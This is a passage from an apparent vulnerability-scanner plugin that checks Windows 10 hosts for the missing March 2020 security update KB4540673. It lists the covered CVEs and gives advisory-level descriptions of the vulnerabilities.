\"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0798\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0807\",\n \"CVE-2020-0808\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0811\",\n \"CVE-2020-0812\",\n \"CVE-2020-0813\",\n \"CVE-2020-0814\",\n \"CVE-2020-0816\",\n \"CVE-2020-0819\",\n 
\"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0825\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0848\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0854\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0863\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0876\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4540673\");\n script_xref(name:\"MSFT\", value:\"MS20-4540673\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540673: Windows 10 Version 1903 and Windows 10 Version 1909 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540673.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. 
An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when\n Wind